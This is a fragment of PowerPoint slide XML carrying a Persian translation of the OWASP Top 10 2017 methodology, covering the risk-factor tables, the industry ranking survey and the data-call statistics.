                        <a:t>لاگینگ و مانیتورینگ نا کارآمد </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fa-IR" sz="800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۲</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900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شایع: ۳</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>سخت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: ۱</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fa-IR" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متعادل: ۲</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fa-IR" sz="800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص برنامه کاربردی</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10"/>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fa-IR" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>شیوع</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03369" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>قابلیت کشف</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a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>قابلیت بهره برداری</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fa-IR" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>تکنیکی</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759009" y="2460486"/>
            <a:ext cx="4887049" cy="565200"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="605558"/>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06934"/>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4800603" y="2846743"/>
            <a:ext cx="2543832" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>کسب و کار</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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>جزئیاتی در مورد فاکتورهای ریسک</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3398801930"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6858000" cy="9005415"/>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8727">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مرور</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="600310">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در نشست پروژه </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>شرکت کنندگان فعال و اعضای جامعه از</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> منظر آسیب‌پذیری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> تصمیم گرفتند،</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> کلاس‌های آسیب‌پذیری را با استفاده از داده‌های کمی و تا حدی با بررسی‌های کیفی، 2 پله به جلو ببرند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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r h="338727">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600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بررسی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> رتبه‌بندی صنعت</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3770985">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>برای این نظرسنجی، ما دسته های آسیب پذیری را که پیش از این به عنوان </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>on</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> the cusp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" baseline="0" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>شناخته شده بودند و یا در لیست بازخورد 2017 RC1 در فهرست Top 10 ذکر شده</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" baseline="0" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> بودند، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>جمع آوری کردیم. ما آنها را به یک نظرسنجی رتبه بندی کرده ایم و از پاسخ دهندگان خواسته ایم تا چهار آسیب پذیری را که باید آنها را در OWASP Top </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" baseline="0" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> 10-2017 قرار گیرند رتبه بندی کنند. این نظرسنجی از 2 آگوست تا 18 سپتامبر 2017صورت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" baseline="0" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> گرفت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" dirty="0">
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>. 516 پاسخ جمع آوری شد و آسیب پذیری ها رتبه بندی شدند.</a:t>
                      </a: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B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-7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endParaRPr lang="fa-IR" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="fa-IR" sz="950" b="1" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" u="none"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extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr xmlns="" xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>افشای اطلاعات خصوصی به وضوح در صدر آسیب پذیری ها قرار دارد، اما بعنوان یک تاکید اضافه روی این موضوع است:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:endParaRPr lang="fa-IR"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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>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 Exposure</a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:endParaRPr lang="fa-IR" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شکست های رمزنگاری در گروه افشای اطلاعات حساس قرار میگیرند.</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Insecure deserialization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>در رده ی سوم قرار دارد.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fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>بنابراین در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OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>بعنوان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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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دیسریالیزیشن نا امن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fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>اضافه شده است بعد از ارزیابی خطر. رتبه ی چهارم ، کلید تحت کنترل کاربر است و در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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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کنترل دسترسی ناقص</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> قرار داده شده است. جالب است که با اینکه دیتای زیادی در مورد مشکلات امنیتی احراز هویت موجود نیست ، اما این آسیب پذیری رنک بالایی دریافت کرده است. جایگاه پنجم در رنکینگ اختصاص دارد به لاگینگ و مانیتورینگ نا کارآمد که به اعتقاد ما در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TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>باید جایگاهی داشته باشد که به همین دلیل تبدیل به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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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لاگینک و مانیتورینگ نا کارآمد</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fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> شده است.ما به نقطه ای رسیده ایم که برنامه ها نیاز دارند حملات را تعریف کرده و لاگینگ و هشدار و افزایش دسترسی و واکنش مناسب را نشان دهند.</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338727">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600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>درخواست دیتای عمومی</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:latin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44163525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3578924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>به صورت سنتی ، دیتای جمع شده و آنالیز شده بیشتر در طول مسیر فرکانس داده بوده است : چند آسیب پذیری در برنامه های تست شده پیدا شدند. با توجه به اینکه خیلی خوب شناخته شده است ، ابزارها به صورت سنتی تمام انواع پیدا شده ی آسیب پذری و انسان ها را به صورت سنتی به شکل یک یافته با شماره ي مثال گزارش میدهند. این جمع آوری دو استایل مختلف گزارش را به شکلی قابل مقایسه بسیار سخت میکند.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endParaRPr lang="fa-IR" sz="950" dirty="0">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algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-I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8">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr xmlns="" xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>برای ۲۰۱۷ ، نرخ حادثه بر اساس اینکه چند برنامه در یک دیتاست دارای یک یا بیشتر از یک نوع خاص آسیب پذیری هستند محاسبه میشود. دیتا از بسیاری مشارکت کنندگان بزرگتر در دو دیدگاه آمده است. اولی استایل سنتی مرسوم شمارش هر تکرار از آسیب پذیری است، در حالی که دومی شمارش تعداد برنامه هایی است که در آنها هر آسیب پذیری یک یا بیشتر بار پیدا شده است. در حالی که کامل نیست، این مورد به صورت قابل قبولی  به ما اجازه ی مقایسه ی داده ی انسان های مجهز به ابزار و ابزارهای مجهز به انسان را میدهد. دیتای خام و آنالیز در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>گیت هاب</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>موجود است .</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>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algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ما بیش از ۴۰ توافق در مورد درخواست داده دریافت کرده ایم، و به این دلیل که خیلی از آنها شامل داده ی اصلی پر از تکرار بودند ، قادر بودیم تا دیتای ۲۳ مشارکت کننده که حدود ۱۱۴ هزار برنامه را شامل میشد استفاده کنیم. یک دوره ی یک ساله از زمان را که توسط مشارکت کننده تعیین شده بود و ممکن بود را به این مورد اختصاص دادیم.اکثر برنامه ها منحصر به فرد هستند، اگرچه ما از احتمال تکرار برنامه ها در بین دیتای یک ساله از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Veracode </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> قدردانی میکنیم. ۲۳ دیتاست استفاده شده یا به عنوان تست انسانی مجهز به ابزار شناسایی شدند یا نرخ حادثه منحصرا تدارک دیده شده از ابزارهایی که با همکاری انسان کار میکنند. ناهمگونی ها در دیتای انتخاب شده از بیش از ۱۰۰ درصد رخدادها به نهایتا ۱۰۰ درصد کاهش پیدا کردند. برای محاسبه ی نرخ تصادف، ما درصد کل برنامه هایی که شامل هر آسیب پذیری بودند را پیدا کردیم. رتبه بندی حوادث برای محاسبه شیوع خطر کلی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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> استفاده شد.</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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>روش و داده </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="988880240"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
